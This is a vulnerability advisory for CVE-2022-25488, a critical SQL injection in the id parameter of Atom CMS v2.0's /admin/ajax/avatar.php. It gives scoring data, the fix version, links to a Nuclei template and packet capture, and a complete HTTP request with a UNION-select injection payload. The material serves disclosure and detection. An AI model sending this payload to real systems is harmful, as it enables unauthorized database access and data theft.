| Title | Atom CMS v2.0 - SQL Injection |
|---|---|
| Author | theamanrawat |
| Severity | Critical |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. |
| Remediation | Fixed in version Atom CMS v2.1 |
| CVSS Score | 9.8 |
| EPSS Score | 0.72376 |
| CVE ID | CVE-2022-25488 |
| CWE ID | CWE-89 |
| Tags | cve cve2022 sqli atom cms thedigitalcraft vkev vuln |
Atom CMS v2.0 was discovered to contain a SQL injection vulnerability via the id parameter in /admin/ajax/avatar.php.
GET /admin/ajax/avatar.php?id=-1+union+select+md5(9089)%23 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-25488.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-25488.pcap
N/AN/A